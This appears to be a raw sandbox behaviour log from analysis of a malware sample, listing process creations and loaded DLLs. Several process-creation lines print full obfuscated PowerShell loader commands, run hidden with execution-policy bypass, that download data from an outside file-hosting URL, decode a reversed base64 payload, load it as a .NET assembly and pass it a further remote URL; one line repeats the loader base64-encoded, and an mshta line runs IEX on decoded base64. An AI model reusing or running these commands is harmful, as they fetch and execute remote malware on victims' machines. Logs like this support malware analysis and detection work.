          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
